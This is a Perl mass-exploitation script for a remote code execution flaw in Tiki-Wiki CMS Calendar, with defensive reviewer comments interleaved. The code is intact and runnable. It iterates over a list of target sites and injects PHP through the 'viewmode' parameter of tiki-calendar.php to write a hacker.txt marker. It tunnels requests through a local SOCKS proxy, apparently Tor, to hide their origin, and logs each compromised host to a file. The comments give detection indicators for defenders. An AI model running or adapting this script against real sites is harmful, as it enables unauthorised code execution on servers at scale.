1 | #!/usr/bin/perl | |
2 | # ->Coder By CrashBandicot | |
3 | # | |
4 | # Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution | |
5 | # discovery by Dany Ouellet | |
6 | # ref: https://www.exploit-db.com/exploits/39965/ | |
#
# Reviewer summary of what this listing does:
#   - Input:  a text file of base URLs, one per line, named by the first
#             command-line argument.
#   - Per URL: one GET to /tiki-calendar.php whose `viewmode` parameter carries
#             PHP code, then one GET to /hacker.txt to see whether it ran.
#   - Output: every URL whose /hacker.txt response contains "hacker" is
#             appended to savetiki.txt in the working directory.
#
# Indicators a Tiki operator can search for, all taken from the lines below:
#   - access-log entries for tiki-calendar.php where `viewmode` contains an
#     encoded quote (%27) followed by `;` and PHP calls (fopen/fwrite/fclose);
#   - a file named hacker.txt containing "by hacker" next to the Tiki scripts
#     (the fopen() path is relative -- presumably the web root; confirm);
#   - the fixed User-Agent string set on the client (weak signal, one-line change).
# A host that serves the marker file has executed request-supplied PHP, so
# handle it as code execution on the server rather than as a stray file.
# This listing does not say which releases carry the fix; take the patch
# level from the advisory referenced above and the vendor's release notes.
#
# NOTE(review): no `use strict; use warnings;` -- every variable below is an
# undeclared package global.
7 | ||
8 | use LWP::UserAgent; | |
9 | use LWP::Protocol::socks; | |
10 | use HTTP::Request::Common; | |
11 | ||
# Clears the terminal; the command is chosen from the OS name in $^O.
12 | if ($^O =~ /Win/) { system("cls"); } else { system("clear"); } | |
# Banner and usage text (multi-line string literal, printed unconditionally).
13 | print " | |
14 | ||
15 | Tiki Mass Explo!ter RCE | |
16 | by CrashBandicot | |
17 | ||
18 | Usage : $0 list.txt | |
19 | ||
20 | \n"; | |
21 | ||
22 | ||
# NOTE(review): two-argument open with a bareword handle; the mode character
# and the file name share one string, so the argument is not treated as a
# plain path. Dies with $! when the list cannot be opened.
23 | open(tarrget,"<$ARGV[0]") or die "$!"; | |
# One iteration per line of the list; the line is used as a URL prefix as-is
# (no validation, no scheme check).
24 | while(<tarrget>){ | |
25 | chomp($_); | |
26 | $webs = $_; | |
27 | ||
28 | print " [+] Scanning -> $webs"; | |
29 | ||
# Single-quoted, so $z and $a are literal text, not Perl variables. The value
# of `viewmode` starts with an encoded quote and `;`, i.e. it closes a quoted
# string on the server side and appends PHP statements that write a marker
# file. For detection: a `viewmode` value containing %27, `;` or `$` is
# presumably never legitimate for a calendar view name -- confirm against the
# application before alerting on it.
30 | $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27'; | |
31 | ||
# A new client object is built for every URL.
32 | $ua = LWP::UserAgent->new(); | |
# All http/https traffic goes through a SOCKS proxy on localhost:9150
# (presumably a local Tor listener -- confirm), so the source addresses seen
# in server logs are the proxy's exits and IP-based blocking is a weak control.
33 | $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150'); | |
34 | $ua->timeout(30); | |
# Hard-coded User-Agent; identical on every request this listing sends.
35 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); | |
# The response object is stored but never inspected (no status check).
36 | $fuck = $ua->get($webs.$payload); | |
37 | ||
38 | $def = $webs."/hacker.txt"; | |
39 | ||
# Second request: fetch the marker path and keep only the body.
40 | $check = $ua->get($def)->content; | |
# Substring match only; the HTTP status of the marker request is not checked,
# so an entry in savetiki.txt is this tool's guess, not proof. Confirm on the
# host itself (file on disk, matching access-log pair) during triage.
41 | if($check =~/hacker/) { | |
42 | ||
43 | print "\n\n [+] File Uploaded >> $def\n"; | |
44 | ||
# NOTE(review): append-mode open with no error check; a failed open makes the
# following print and close fail without any message.
45 | open(save ,">>savetiki.txt"); | |
46 | print save "$def\n"; | |
47 | close save; | |
48 | ||
49 | ||
50 | } else { print "\n [-] File Upload Fail\n"; } | |
51 | ||
52 | ||
53 | }